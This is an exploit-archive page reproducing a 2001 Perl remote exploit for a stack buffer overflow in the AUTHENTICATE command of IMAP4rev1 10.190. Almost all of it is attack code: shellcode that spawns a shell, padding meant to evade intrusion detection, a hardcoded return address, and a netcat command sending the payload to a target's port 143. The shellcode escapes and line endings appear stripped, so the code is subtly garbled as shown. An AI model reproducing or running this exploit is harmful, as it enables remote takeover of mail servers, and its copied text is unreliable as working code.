IMAP4rev1 10.190 Authentication Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IMAP4rev1 10.190 Authentication Stack Overflow Exploit
# Published : 2001-01-19
# Author : teleh0r
# Previous Title : Netscape Enterprise Server 4.0/sparc/SunOS 5.7 Remote Exploit
# Next Title : Cisco Password Bruteforcer Exploit

#!/usr/bin/perl

## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: teleh0r@doglover.com / anno 2000
##
## This is nothing new - just wrote it for fun.

$shellcode = "xebx35x5ex80x46x01x30x80x46x02x30x80".
             "x46x03x30x80x46x05x30x80x46x06x30x89".
             "xf0x89x46x08x31xc0x88x46x07x89x46x0c".
             "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80".
             "x31xdbx89xd8x40xcdx80xe8xc6xffxffxff".
             "x2fx32x39x3ex2fx43x38";


$len = 1052;       # Sufficient to overwrite the return value.
$nop = A;          # Using A/0x41 as nops to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.

if (@ARGV < 2) {
    print("Usage: $0 <target> <offset>n");
    exit(1);
}

($target, $offset) = @ARGV;

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

$exploit_string = "* AUTHENTICATE {$len}1512$buffer12";

system("(echo -e "$exploit_string" ; cat) | nc $target 143");


# www.Syue.com [2001-01-19]